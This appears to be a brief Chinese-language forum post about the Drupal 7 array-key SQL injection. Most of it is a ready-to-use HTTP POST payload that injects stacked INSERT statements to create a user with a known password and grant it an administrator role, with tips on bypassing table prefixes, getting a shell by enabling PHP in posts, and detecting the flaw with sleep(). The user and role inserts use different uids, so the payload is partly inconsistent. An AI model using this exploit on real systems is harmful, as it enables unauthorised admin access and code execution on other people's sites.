漏洞原理drops已有,数组拼接sql语句是key注入,由于pdo_mysql可执行多条sql语句。GetShell 也很简单,添加支持php语法,发文章直接写php代码。 看到很多人在讨论有表前缀怎么执行sql,发个无视表前缀的添加管理员poc |
POST /cms/drupal/drupal7/ HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 294 name[0%20;insert+into+{users}+(uid,name,pass,status)+values+(333333,'tes3333','$S$DrxHxKj6w11uEr04c1mBk.zeoEDoVgklllN2A3AOOJvooOfiqn9Y',1);insert+into+{users_roles}+(uid,rid)+values(999999999,3);#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
密码 testss,users 用 {users}代替 ,就和dedecms sql语句中的#@__members,检测可以使用 select sleep(999999999999999999999999). |